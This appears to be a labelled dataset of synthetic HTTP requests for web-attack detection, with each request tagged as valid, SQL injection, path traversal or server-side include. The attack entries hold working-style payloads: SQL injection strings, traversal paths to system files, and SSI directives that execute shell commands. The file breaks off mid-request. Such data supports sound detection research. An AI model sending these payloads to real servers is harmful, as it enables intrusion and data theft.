GET /loc_13Po/Htsethosn9e7nOUntzCv/rn/iat9EpTOAe4in/lAjHizzD6window.open/7eSKctJfyf0B2c71j/varhE.ll6393MdWsscript/tB2kEHHn9S/czZgM39X8GjLMHRJytW/ttnxuthlbaitio/noeq6gNsgh.js?oiumsacanusaees=qvw&jtslv2AiavhiSr=48808903 HTTP/1.1
Host: www.ilrrn6rwrl.biz:37964
Connection: close
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: min-fresh=2
Client-ip: 139.174.236.37
Cookie: fluaniEtD=eORNkk;saNawinuxiIrdec=) (  |   (    cn=*o   'brien*   )(mail  =*o   'brien*)   ;sIhtxerehrt=25997;ee26ck2=hie54from
Date: Thu, 22 Oct 09 02:58:28 UTC
ETag: W/"KCI@kN0BmfRCknwK6xXS"
From: god7on@cdae.de
If-Modified-Since: Wed, 31 Mar 04 06:12:11 UTC
If-Unmodified-Since: Sat, 17 Apr 10 20:34:08 UTC
If-Match: *
If-None-Match: "-gJecFli@mB4gOb"
If-Range: Fri, 09 Oct 09 19:00:34 CET
Max-Forwards: 034
MIME-Version: 0.1
Pragma: 691ssh2='e'
Authorization: Basic bnJibzppYWVhbm4=
Range: 0197-,73847-461778
Referer: http://www.elo8ed.gov/Fewya/twxo5lnr/lits/htetl/p5re.mspx
TE: trailers
User-Agent: Mozilla/8.4 (X11; U; Solaris 0.1; pk-mn; rv:3.7.5) Gecko/10689299
Via: 3.9 35.41.75.226, 9.4 www.snechnne.gif, 2.3 www.TsoeoEa.png
Upgrade: E4o6/0.9
Warning: 873 www.uz4i3.js "138m9djRanlflt" "Tue, 02 May 06 22:00:02 CET"
----: ----------------------------------------

null

End - Id: 36884
Start - Id: 41801
class: SqlInjection
GET /da8iailet3u/rmvar7rTPnxxmlTwhere@Otmp/ee/sriodnesfeGiizeAadm/4pghdswaEbO1n0nS9nr/0nall7R9UduOftpKcat/acw.IAPWK3vIPf/hI0o9/wXVo0vJqvbscriptV-.png?ohehqEiAat=4&gnu=aon7IWU&9Iyrmis=eoraeeonn8spml&hiEb1ontioa6=33766429&reTsdbdniftdhla=%5CjUl+muot&likeBRnu7h5dTin=rMEPD_2B&Y4-G3F1=bpTjzvjyQLF&aftzoaphLmt=or++++0%3C%3E%28select+++count%28*%29++++from++tovnq%29 HTTP/1.0
Host: 76.217.112.242
Connection: rnueshv
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: max-stale=10
Client-ip: 218.44.126.244
Cookie: svaNelkeht=er;nltchk5wrlhh=h;iusb6=ehcidOtn oqs;hi=0;Z8cuw.ercpdocumenthavingEF=9psgOeskns;rxtei=hUp.nJ2-Be
Cookie2: $Version="874"
Date: Tue, 31 Oct 06 20:06:57 UTC
ETag: W/"u-p0upc_i-I_o6YnCF5"
Expect: ytnux=thiRx
From: ame9p@neehptrbo.fr
If-Modified-Since: Sat, 23 Sep 06 08:48:25 UTC
If-Unmodified-Since: Thu, 19 Nov 09 01:50:50 GMT
If-Match: *
If-None-Match: "77e92Z0oWxPyN5gW"
If-Range: *
Max-Forwards: 9815
MIME-Version: 8.5
Pragma: tmge=bSuNI
Proxy-Authorization: dgDa4v rdekp=aenneN
Authorization: Basic bm50dTpBZXRoYQ==
Range: 6-,0-8
Referer: http://www.2uqT.uk/l9Nng/ltIt/eoytEw6.nsf
TE: gzip,trailers,deflate;q=0.4
Trailer: Max-Forwards
User-Agent: wdartj3ez/7.0
UA-CPU: x86
UA-Disp: 885,1136,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 1113x6739
Via: 9.1 www.etfpedp.gif
Transfer-Encoding: compress
Upgrade: eet/8.2, womym/1.9, Orius/4.0, orvtl/1.7, sae7/5.2
Warning: 864 www.eeeoa.css "hlrre9anouesreagre4w" 
X-Forwarded-For: 234.161.201.75
X-Serial-Number: 12063263563674128535
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 41801
Start - Id: 45714
class: PathTransversal
GET /slaeehecy7q/e-AvEADMCUlV.jpg?drlsfAieda7=avBPigx&eoi7ji=rhdaeesvyinjnid8&binETm-Ob0eX=%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Ftend%2Fnslaeseser%2Fnaal%2Fll.sh&Loqm=969 HTTP/1.1
Host: 85.118.228.27
Connection: close
Accept: */*;q=0.5
Accept-Charset: *;q=0.2
Accept-Encoding: compress, compress;q=0.0, gzip;q=0.2, gzip
Accept-Language: *
Cache-Control: max-age=49806
Client-ip: 244.124.85.82
Cookie: daddT=t\huoor;intrnsiorr5=mtirhtaccesob)ne;N6ehaniieaetl=ieew;h6hctrdEethcuyn=ormeoiodz6ui;Z6ui3rLO5Yt=%;h3ea=nEo tEs7Ril&lccand6t
Cookie2: $Version="0"
Date: Tue, 22 Nov 05 13:01:17 GMT
ETag: W/"skf@5ex@3kGAQzU0"
Expect: esf5d5=o26ss;rpg2hNxt=sn9g
From: gAo4ot1@1soairea.gov
If-Modified-Since: Thu, 10 Nov 05 18:55:36 UTC
If-Unmodified-Since: Thu, 04 Oct 07 10:46:34 CET
If-Match: "_O2__yriN3AkuCtSwCg"
If-None-Match: "Sryf3TrOn4Yq.m5K"
If-Range: "yAiKVCoL_cUrrhszV"
Max-Forwards: 2070
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: NTLM ZXVvYmxtb2VldVNiVzJzS2Zyc2V0ZWVhZGd4c296a29pNjJlNmhIclJpc3ZsZGI4
Range: -958,-975,-318
Referer: /hnho7fv/9den/d2hpeu.dll
TE: trailers,chunked;q=0.3,trailers
Trailer: Cache-Control
User-Agent: ssEI/9.9.5.5.3
UA-CPU: x86
UA-Disp: 8763,047,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 967x7308
Via: FTP/1.3 www.sfprl.css, 2.9 19.72.15.220, 7.2 www.ioih.gif
Transfer-Encoding: 0tlo
Upgrade: sz3/7.1, 6Dnd/4.3
Warning: 288 223.210.181.104 "nzlia9itn3swklmex" "Fri, 29 Apr 05 08:27:02 GMT"
X-Forwarded-For: 139.27.168.135
X-Serial-Number: 1618317
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45714
Start - Id: 41300
class: SqlInjection
GET /J_dILdiWfDfQOr/e2VixqZiEtc/eiyD2Wy5TVpeBocQdZ/lDP05/tebeewaoen4lo/tNa3/9da6zrwindow.openVnbsall./jYfZUebmGOo/t4rrrlwtnEhassrhetal/kaAn@KtJ5/ruiosl3ihtEeo.swf?whEB71aehst8e1t=%7Eoak&gzetcDvdraI-=11&tmsy6tTrFa=s8oYx HTTP/1.0
Host: 86.246.148.59
Connection: close
Accept: video/*;q=0.8, application/x-tar;q=0.4, audio/*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 97.182.86.80
Cookie: daneitdte7=; exec    get_cust(  'x''  union     select     object_name,object_type,''x''     from    user_objects   where    ''arw''  = '' '    );;SC=mvetsr1tte6<l;v1ht2bp=olrh;tee9=kz.0QJMNIJJ
Cookie2: $Version="869"
Date: Mon, 25 Dec 06 10:54:32 GMT
ETag: "JhjNr2i1GthRTBS"
Expect: s5Ejl
From: 7jtnsEc@oHtbtu9a.biz
If-Modified-Since: Thu, 15 Apr 10 09:27:44 GMT
If-Unmodified-Since: Sat, 16 Sep 06 01:55:13 UTC
If-Match: *
If-None-Match: "O08G@4g2lzSxanf"
If-Range: Mon, 08 Oct 07 05:20:19 UTC
Max-Forwards: 073
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: Basic dHNoZWxpOmdrbWRsYmk=
Authorization: imot0Y 4bte=iAto
Range: 1-,9-8
Referer: http://www.uyau4ya.fr/mottob.png
TE: gzip;q=0.8,deflate;q=0.6,gzip
Trailer: User-Agent
User-Agent: Mozilla/7.1 (compatible; nutzz; Open BSD i386; PeeeAoaoSe; lnfedWmRll)
UA-CPU: 68000
UA-Disp: 8902,8291,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 470x0638
Via: 7.1 162.127.39.189, FTP/6.7 143.237.13.221, 8.0 249.131.140.102
Transfer-Encoding: deflate
Upgrade: e1em/3.9, othbu/3.3, yin/5.4, shfedi/0.7
Warning: 387 186.147.86.32 "h3ea5eriueh" 
X-Forwarded-For: 0.5.238.60
X-Serial-Number: 99307036492325759306
----: ----------------------------

null

End - Id: 41300
Start - Id: 6149
class: Valid
PUT /mosboirsa/linkn5node9/emBZMgwVi/vHT1ls.tiff? HTTP/1.0
Content-Length: 41
Content-Language: i0,dH
Content-Encoding: identity
Content-Location: /fnV1ee/ni0ity2.cgi
Content-MD5: aG9kbDFFYml2N25UYWFzaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 24 Jan 10 11:56:02 GMT
Last-Modified: Wed, 26 Jan 05 08:15:15 UTC
Host: www.ae97t7nai.de
Connection: close
Accept: */*
Accept-Charset: x-mac-japanese, x-mac-greek, us-ascii
Accept-Encoding: 
Accept-Language: Nnjazad-erndae, vntyv-o;q=0.6
Cache-Control: no-transform
Client-ip: 193.131.23.121
Cookie: mef0=5KJ0gjNhZj;Evffmelioo=n5;eussIg=rejhu;iusHXogixt2=nana
Cookie2: $Version="52"
Date: Sun, 04 Jan 04 12:24:33 UTC
ETag: W/"MQzxvwe@Bl7f7pTS76YH"
Expect: gbEoaHe=mbo4l
From: arnac8@nERnnE.be
If-Modified-Since: Mon, 17 Dec 07 22:55:21 CET
If-Unmodified-Since: Wed, 13 Jul 05 10:21:17 CET
If-Match: "2D@4@sWnPI0He5H3_@vV"
If-None-Match: *
If-Range: Mon, 23 Jul 07 02:37:07 GMT
Max-Forwards: 8
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: Digest opaque="atR3"
Authorization: ettpre Oeat=7dtf2s
Range: 611533-,1458-075
Referer: /zefciig/oNZIDea9/s2saiau.mpeg
TE: gzip;q=0.0
Trailer: Upgrade
User-Agent: Mozilla/6.5 (Machintosh; U; PPC Mac OS X 0.7; Od-mE; rv:2.6.6) Gecko/06528754
UA-CPU: PowerPC
UA-Disp: 8680,157,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 0700x717
Via: HTTP/8.5 177.106.151.10
Transfer-Encoding: deflate
Upgrade: nHrl17/0.4
Warning: 194 www.xmkm27h.jpg "hyeTpth" 
X-Forwarded-For: 175.130.165.6
X-Serial-Number: 9298253900687
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

m@O-T=Itp2rs6oheot&qiAuAiocrnher=tstted6i

End - Id: 6149
Start - Id: 466
class: Valid
GET /57Lij8iQuBi/gD/homhmirmnacrviviyt34/g1nadLltmaso0/1rpT1egemtEEgs/be90a.jsp? HTTP/1.0
Host: 9.139.179.64
Connection: close
Accept: */*;q=0.1
Accept-Charset: utf-8, macintosh
Accept-Encoding: gzip, identity;q=0.6, compress;q=0.7
Accept-Language: wk-0o, ev-sarf9
Cache-Control: max-stale
Client-ip: 102.28.120.62
Cookie: e3qXtplJs2=tnixs1natr;dgr=mas;4eloe=twx
Cookie2: $Version="25"
Date: Fri, 08 Oct 04 09:02:19 CET
ETag: W/"99Mw4G9Fs96hsTS6Z"
Expect: skeo
From: oeicnnb@t32welnr5i.biz
If-Modified-Since: Mon, 09 Oct 06 14:12:34 CET
If-Unmodified-Since: Mon, 29 Dec 08 09:54:22 UTC
If-Match: *
If-None-Match: *
If-Range: "CK-k1n6@SvwNx1y"
Max-Forwards: 8190
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: NTLM aG5pRmhlbmhyYXNsSTF5dGNhZXlvaXJybmVvZDkzcklpaWg5cG90YVNlbA==
Authorization: NTLM TmtpcG10ZXJwaWlubXNGYkY2c3NoaGlldGFuaXR3VGdodHVyZm12cEVlZDRlaQ==
Range: 0733-,91-
Referer: http://4PbPd3.uk/Soghrne/sntd/as0o7tdl/sscm/strrnGU.js
TE: chunked
Trailer: Proxy-Authorization
User-Agent: Mozilla/9.9 (compatible; Konqueror/0.9; Open BSD i586; bahn8; hUrnie)
UA-CPU: x86
UA-Disp: 506,620,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 7413x7082
Via: FTP/2.2 32.76.181.181, HTTP/8.2 74.197.75.107, ent/7.7 200.250.83.97
Transfer-Encoding: gzip
Upgrade: tea3io/7.5
Warning: 976 148.134.175.140 "ftiyhn7Flr5m" "Sun, 28 Feb 10 03:59:16 CET"
X-Forwarded-For: 85.121.116.193
X-Serial-Number: 9170010950
----: --------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 466
Start - Id: 9088
class: Valid
GET /ajqnbcifdDoonebndin/5aIo2CEdofierSson/ifdh/oAJSD/ir/ntfourefjt1etq/0ervj/aeS4KrDhcS._9bzPimlV/yrHUSx0u/dTUEXury@XHHW/eto5pa4.jpg?5eztoi6jasCroen=58320&tfli=jepstmnEer+tten&he4atAh1oaeo=ID%3ET&2nNBWT_C5G0n=6&2R8x=o3gQvL&rhhpo=15559&pl7bdhyosmyv=4QWLOeWgsJN&4hdm9etrt=cYfUubqmz4O&joe=4jyoiT&de=ixekh%2FsslzCh HTTP/1.0
Host: 134.88.68.229:80
Connection: nuckg
Accept: audio/basic
Accept-Charset: windows-1251;q=0.1, x-mac-chinesesimp, cp-936, iso-8859-8-i
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 252.114.168.96
Cookie: nsyseserFiuehr=?rg;rLsiq8urrlo=wh3A2RT;sr=cncl3askun0S21
Cookie2: $Version="10"
Date: Wed, 02 Dec 09 20:26:55 UTC
ETag: W/"3l9qrxDIQubeQZBIZ"
Expect: atctr7=tetz0Vi;iurtb
From: riunul@rssjpw.cz
If-Modified-Since: Mon, 15 Aug 05 17:56:16 UTC
If-Unmodified-Since: Fri, 19 Oct 07 14:41:53 UTC
If-Match: "JKEw7osE1mslf@Rn"
If-None-Match: "xzWN2n4h_SfpXoH"
If-Range: *
Max-Forwards: 2
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: NTLM ZW5pZGlub3N0YWVuYUVieW5iYmhybmNXbXdvdGJLc3NhZXM=
Authorization: Basic bnZ5YzpuY25s
Range: -74002,17-59,16-
Referer: http://www.etaerr.org/t9j7T/bDkIeate/k6xso/hbuA/touphOa0.msf
TE: gzip;q=0.6,trailers,deflate
Trailer: If-Modified-Since
User-Agent: vaoskpbdtulri
UA-CPU: Sparc
UA-Disp: 6130,9479,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 9463x953
Via: lioef/7.5 www.editee.jpg
Transfer-Encoding: compress
Upgrade: sty0e/2.8, oag0R/6.1, o9omrp/3.1, sirw/2.4
Warning: 284 243.236.131.97 "ecoowdcc2ipb" "Fri, 03 Apr 09 17:35:41 CET"
X-Forwarded-For: 44.108.222.96
X-Serial-Number: 442361
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9088
Start - Id: 35016
class: SSI
GET /feeIilfbpoa/tUDds/nreiesStthHbni6/oStNatseituuqss/oiyoisgOt/dausell/QNincludekOrr0e/1trTpmitto/4t70Z9OlbVxkCG/httpsngNe2J8UK6/udnthohs/wshhby.tiff?uearg26aWd=opt+&s9ntularsg1sawt=%3C%21--++%23odbc+statement%3D%22select+++++oenhma7%2C+++++ejs%2C+++++De++++from++qor6eatE++++order+by+++++1%2C+++++71%2C++5%22+++++--%3E&3eaedoeoc1f=o-0where&ns0psoAjhtWpKk=0&ibi=05797510&eunk70ndttice5u=d8vCoG0AMo HTTP/1.0
Host: 213.195.47.159
Connection: ystetSh
Accept: text/*, text/plain;q=0.7
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 4.200.130.247
Cookie: w6t4sep=paeIjarmsa;Ngdoltnn=qnr?h4<iqgaVd
Cookie2: $Version="03"
Date: Wed, 02 Aug 06 19:05:57 UTC
ETag: "KYoXjWwTkS0NnJtO"
Expect: 100-continue
If-Modified-Since: Sat, 14 Aug 04 18:09:52 UTC
If-Unmodified-Since: Mon, 22 Jun 09 03:57:45 GMT
If-Match: *
If-None-Match: "EpxhN-4iy1uzbvI"
If-Range: *
Max-Forwards: 48
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: eube 9onTe=vtdcQ2b
Authorization: Digest opaque="hSatry"
Range: 4978-84,830195-719467,3968-5663
Referer: http://utze.it/omle.js
TE: trailers,gzip;q=0.2,gzip;q=0.0
Trailer: TE
User-Agent: ugzn/6.1
UA-Disp: 591,2408,8
Via: 4.8 www.5itsnrY.tiff
Transfer-Encoding: compress
Upgrade: h7d/2.3
Warning: 263 www.e9be2hr.html "mdtH2tslorrnro9svi" "Mon, 13 Jul 09 18:12:47 GMT"
----: ---------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 35016
Start - Id: 34259
class: Valid
PUT /r3laeruhcssOre7w/vttsssetr/oe/ovbYnkcBDljTod5_8Rc/ytlgmo/vp7/ZOwQW2TW91GL93/tjBp5.f8Zymjk7CgzHFW/LBnLIQcinevalu/ocepaeoB9/eeBRKktr1ncDTI/t6xkmqWBiK.sh? HTTP/1.1
Content-Length: 70
Content-Language: m,ama,neo
Content-Encoding: deflate
Content-Location: /rleqt/dre9he/evcnaekl/eeqqaai.js
Content-MD5: T2E4ZXV3ZWVlaGFhdHVuZg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 11 Jun 05 15:14:47 UTC
Last-Modified: Thu, 25 Dec 08 17:37:34 GMT
Host: www.xeta9vmce7.it:6
Connection: keep-alive
Accept: audio/basic, text/plain;q=0.4, image/*;q=0.5
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: nssoyd-o;q=0.7, nzNt-tlhh
Cache-Control: no-transform
Client-ip: 203.243.153.73
Cookie: iilHbsesJh=nerN4uOS;rur=p5Ttislot=;dteo12=+y+htacces
Cookie2: $Version="47"
Date: Tue, 19 Jan 10 19:06:05 UTC
ETag: W/"wraIMkdB4WhEjaXcNXf8"
Expect: 100-continue
From: uoRceh@bnhno.gov
If-Modified-Since: Sat, 17 Mar 07 02:39:24 UTC
If-Unmodified-Since: Fri, 01 Jan 10 08:14:20 UTC
If-Match: *
If-None-Match: "CjLLPjlGKPjfFXj"
If-Range: Wed, 26 Oct 05 03:39:22 CET
Max-Forwards: 9030
MIME-Version: 0.3
Pragma: n23thi=t9l81v
Proxy-Authorization: Digest username="rtalafh1"
Authorization: NTLM cWl2b3Ryb2hhdGFzbXJzNWhvdmVjbGhkclRlcFF6ZXRlNjJudGVhc3pzc3c=
Range: -804943,968106-
Referer: http://i0hufnno.org/egcitg/adchy/eErxgei/diN8x3r.jpeg
TE: chunked;q=0.6,chunked;q=0.9,gzip
Trailer: User-Agent
User-Agent: Mozilla/9.0 (compatible; ogceno; SunOS sun4u; ltpnye8bn1)
UA-CPU: 68000
UA-Disp: 1874,1837,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2199x3513
Via: HTTP/7.0 www.hr1uEh.html
Transfer-Encoding: gzip
Upgrade: ezhTe/9.1, i0t/1.3, huh/6.9, rDvATi/7.5
Warning: 954 www.nnennttt.js "hztaw" "Sat, 16 Oct 04 21:52:44 UTC"
X-Forwarded-For: 70.193.7.214
X-Serial-Number: 316874692201616
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

esprrtee=at2q&itnmy=8&re=7715&rt=ioHe&js0HnaAera2qe=odhwp-&onsQe=irora

End - Id: 34259
Start - Id: 45772
class: PathTransversal
GET /auQ.m67eRl.-_0/9Tpl3etzEqs/sBdS3yuJZvj/ReinNfaZr/nNzT/jtfbTr8W9xaJ8z/mV1P4X@0/ai7Op5TGryu/eUUb.nsf?oBithyetii4sw=r2&QA5eiebiaodb=97577326&aW2YmbodyRpHly=8630853&eos=t%3A%5C%5CWINNT%5C%5Cwin.ini&ygvv6Os=j%3AesOhddrcepMjT&tf7ann=29&Ohbghriedmca8ho=mqcwindow.opene%3Fasnwi&tsklhze=tgN HTTP/1.1
Host: 62.168.206.64
Connection: qkdeheet
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: h-eatk
Cache-Control: min-fresh=142
Client-ip: 229.242.26.88
Cookie: iTiabtrmh=sw3yrD;turh9rincludes;nhssle=hwioalili
Cookie2: $Version="51"
Date: Wed, 25 Aug 04 05:33:35 GMT
ETag: "o-Sve-wo4yNnUq.x7"
Expect: 100-continue
From: N1sxs@zaktif.st
If-Modified-Since: Mon, 12 Mar 07 21:43:34 CET
If-Unmodified-Since: Tue, 09 Nov 04 15:10:39 CET
If-Match: "BMsax5dEFmjAEaLy0"
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: nE0np rioae=tsisa
Authorization: ApMa hfe8s=xotu3
Range: -500252,934-3694
Referer: http://Slrn.org/ehttei.ace
TE: trailers,trailers,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/5.5 (Machintosh; U; PPC Mac OS X 6.1; Yi-il; rv:6.6.5) Gecko/71031906
UA-CPU: StrongARM
UA-Disp: 4288,202,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 9810x7556
Via: 5.4 www.bh1bcn.jpeg:39915
Transfer-Encoding: identity
Upgrade: auRAi/6.1, wpa/2.1, dH7/6.3, c6nLr/9.1
Warning: 366 www.qjwrkE.jpg:272 "oMcna8llngods" 
X-Forwarded-For: 46.216.57.172
X-Serial-Number: 5959177395
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45772
Start - Id: 15840
class: Valid
GET /nf4/tFKK6CP/evkZE/04RAeas4eteieyla.cfm?iDscearcehoL=68892160&EsMbdtaf1ed=ae&refene0w=%3EOt5&casrsthsNif=En0u&crIeBtarie=iytince9uchee7&dnsuulT=inhomesNcaE&iiFAOMnuxp_H0c=6otthnAoSuaij%7Cdcs&sehkart=30&GOQQNgRAKIgO=%2Br&sptuoc3k=075642&iababmspl=aw1IlxZUfKwl&tirnlTRnlqiLfaO=8904&tonauebii1nefe=fw HTTP/1.1
Host: 4.175.11.139
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: ty=rEet7Tr
Client-ip: 157.184.105.199
Cookie: idaWmeoo9irfes=4e;kMDG=7Fnqz
Cookie2: $Version="1"
Date: Fri, 23 Nov 07 23:50:36 CET
ETag: W/"KRiXJl36fRvn4jrT"
Expect: 100-continue
From: ciaes@3cRcrame2.ch
If-Modified-Since: Fri, 20 Nov 09 08:48:18 UTC
If-Unmodified-Since: Sun, 12 Nov 06 02:48:04 GMT
If-Match: "D.8r@_sO4tcDHtWIqV"
If-None-Match: "5yb_9yqZ3_QqiXDMrE"
If-Range: "@En8ETUAca9IU3nG"
Max-Forwards: 2385
MIME-Version: 8.5
Pragma: and0tesg='e7'
Proxy-Authorization: Basic aXlGbnI2bzA6NG92ZGhkamw=
Authorization: NTLM d2hyZXN1ZW91aWlxaG9lZTRvdHNlbGk1QXRmb3d1dHlscG5sM1RPbnVqdHltbg==
Range: -630,9-,363-
Referer: /tthxm.dll
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: 0pigiic
UA-CPU: MIPS
UA-Disp: 338,6089,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 265x821
Via: 3.0 203.200.20.87, HTTP/1.2 www.sr1ii.js
Transfer-Encoding: deflate
Upgrade: d5co/2.9
Warning: 734 www.a4hol.gif "8eiyls3tra8i3ro" "Sun, 10 Sep 06 06:04:47 CET"
X-Forwarded-For: 157.1.233.188
X-Serial-Number: 6066558353005235
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 15840
Start - Id: 46350
class: PathTransversal
GET /tuo1e5/hFI3.nsf?A9xa=tttiestylehr&op=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fversion&VJ34Bkvy=89325&EtshutdownEaYQ0=%284%40rfpoeia1ee&mfrnoiareoeaans=7665886 HTTP/1.0
Host: www.sdbmqho.net
Connection: dnned
Accept: application/postscript;q=0.3, text/*;q=0.2, text/xml
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.3
Cache-Control: max-stale
Client-ip: 51.115.37.124
Cookie: rhbet=nl(;hr=leuisnVema ?;occ=3E;1bqdriyA=t<;httpsRnc56.Jls=lbenMrteac
Cookie2: $Version="19"
Date: Thu, 31 Jan 08 01:38:46 CET
ETag: W/"iS.lsM4a5lrac@V_Cu"
Expect: 100-continue
From: dB62@isuoongs1.org
If-Modified-Since: Thu, 15 Jun 06 11:09:37 UTC
If-Unmodified-Since: Wed, 27 Jan 10 07:51:17 GMT
If-Match: "Aw1QgKMgfJRrHaYSr0a"
If-None-Match: "rKUAANKDBvP73oT"
If-Range: "cbXFktDtc1jqYeVg"
Max-Forwards: 94
Pragma: hbntrc='i'
Authorization: Digest algorithm=MD5-sess
Referer: http://0hpnj.gov/3v4Slte/q47fmoL.htm
TE: chunked,trailers,chunked
Trailer: Authorization
User-Agent: eoifzspiiwNuerw
UA-CPU: StrongARM
UA-Pixels: 648x2225
Via: HTTP/5.3 www.syrhgka6.js
Transfer-Encoding: deflate
Warning: 915 23.102.86.169 "8rrnetn" 
X-Forwarded-For: 67.104.67.27
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46350
Start - Id: 5604
class: Valid
POST /ewmtqNfttAObdlnI/s@WZ7LOWeF/ennokiAhidS8Yxa/1Gtp/X7UHSKwWEKMstdinkf/0neaT/sXupPus.png? HTTP/1.1
Content-Length: 203
Content-Language: ejwcd,wttOltu,w7Reeo
Content-Encoding: identity
Content-Location: /ihoguse.wav
Content-MD5: ZVRzdGlsZW9yeTRmaWVlaA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 28 Jul 09 03:07:17 CET
Last-Modified: Thu, 23 Sep 04 15:44:02 UTC
Host: www.hasbhn.com:80
Connection: close
Accept: text/*;q=0.5, video/*;q=0.6
Accept-Charset: *
Accept-Encoding: deflate, gzip
Accept-Language: kt-0diit;q=0.3
Cache-Control: no-transform
Client-ip: 177.159.153.146
Cookie: tElnUbe=9252;3x8WBz=448;etiorb=h|
Cookie2: $Version="8"
Date: Tue, 24 Jul 07 20:32:40 GMT
ETag: "_dWm@9n07vqjeO4UE"
Expect: 100-continue
From: eStnia@as0Fhr.uk
If-Modified-Since: Mon, 02 Oct 06 10:48:55 GMT
If-Unmodified-Since: Tue, 21 Dec 04 23:03:21 CET
If-Match: *
If-None-Match: "5oQNS4G@q-o0MI35Llq"
If-Range: Mon, 06 Jun 05 23:15:57 CET
Max-Forwards: 9
MIME-Version: 4.4
Pragma: 8=o
Proxy-Authorization: NTLM aWVmZWpnYWlnbW9kZXJlZE55YTJmRVQ5ZVRFc2VlaHRhZXk=
Authorization: Riea nmahUap=eemhieh
Range: 0245-
Referer: http://www.yrwnoi.uk/herefhe.dll
TE: chunked;q=0.6,gzip,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/4.6 (Windows; U; Win98 0.5; ue-ba; rv:3.9.4) Gecko/25819772
UA-CPU: MIPS
UA-Disp: 6817,0716,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 0202x3743
Via: FTP/4.2 84.85.242.95, HTTP/5.0 198.204.224.252, FTP/5.7 40.85.188.178
Transfer-Encoding: gzip
Upgrade: uv6jTt/2.4
Warning: 752 www.cBkrdl.png "UEoze97gbdRatOio" "Sat, 14 Jul 07 18:16:50 UTC"
X-Forwarded-For: 253.42.32.113
X-Serial-Number: 7014694
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

reAc=jtT iefss&o3=rgiutxsoiX&odnrrerlrd=[2e@&ityi6=FosCiyd2a9Fvhi8&g2aaeao=rtlat&btoS8al=4&itzfdsga=w&Hjscript.Up=3n&abhqieyltPeqie8=29756&5ejt1ozcUx=ilrn n5w>tqe&ecteh=andethorim$&taarnnee=daieh

End - Id: 5604
Start - Id: 39996
class: SSI
GET /4jcatAvkakperl/nd/bYtneooiymheerlotbrd/a3Wq8SfhQyXM./pSF2HTWXzS0et2X/stri/VbinLfl_pUyZl@Z/iISyBRf3mMWiG/Qm0VYMLbodyprTWN9r/IWautoexecQ/pRXT0R-iLWXqGV-m3DFa/cXcz0kW.jpg?lt7sohvYfrb=tEk1VW&nsu3spem=na&ucr8mhdewo=Hop&LioDn6=61945&kutemzitfnfle=enw&nodeK86JqKw.=4mcr&ag=%3C%21--+++++%23exec++++cmd%3D%22%2Fbin%2Fls++++-l+++++%2Fhome%2Fcpae1Ams%2Fl8%22++--%3E&tlgrghisnhloiBt=nl-3&kM.7httpDKQOFf=Aqepi&amikoa=1664132963&BZKXwN.Z2=9&xmlhavingjkn=Tra HTTP/1.1
Host: www.aws34se.st:80
Connection: close
Accept: */*;q=0.7
Accept-Charset: iso-2022-jp;q=0.8, euc-cn;q=0.1, x-mac-greek;q=0.5, x-mac-arabic;q=0.5
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: i=eo
Client-ip: 253.235.28.77
Cookie: astspsa=iv7Q@tiul2o_
Cookie2: $Version="26"
Date: Sun, 06 Mar 05 21:23:05 CET
